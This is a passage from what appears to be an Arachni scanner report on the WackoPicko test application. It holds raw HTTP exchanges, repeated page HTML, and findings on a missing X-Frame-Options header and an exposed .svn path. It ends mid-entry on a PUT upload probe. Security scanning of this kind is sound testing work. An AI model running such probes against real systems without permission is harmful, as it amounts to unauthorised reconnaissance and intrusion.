<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
All fields are required</p>
<table cellspacing="0" style="width:320px">
<form action="/WackoPicko/users/register.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
<tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
<tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/register.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
All fields are required</p>
<table cellspacing="0" style="width:320px">
<form action="/WackoPicko/users/register.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
<tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
<tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
with inputs
username
password
using
GET
at
http://192.168.0.26/WackoPicko/users/login.php
pointing to
http://192.168.0.26/WackoPicko/users/login.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <form action="/WackoPicko/users/login.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> <input type="submit" value="login"> </input> </td> <td> <a href="/WackoPicko/users/register.php"> Register </a> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/login.php | http://192.168.0.26/WackoPicko/users/login.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
The server didn’t return an X-Frame-Options header which means that this website
could be at risk of a clickjacking attack.
The X-Frame-Options HTTP response header can be used to indicate whether or not
a browser should be allowed to render a page inside a frame or iframe. Sites can
use this to avoid clickjacking attacks, by ensuring that their content is not
embedded into other sites.
Configure your web server to include an X-Frame-Options header.
server
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
The server responded with a non 200 (OK) nor 404 (Not Found) status code. This is a non-issue, however exotic HTTP response status codes can provide useful insights into the behavior of the web application and assist with the penetration test.
server
using
GET
at
http://192.168.0.26/WackoPicko/users/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/users/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/users/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
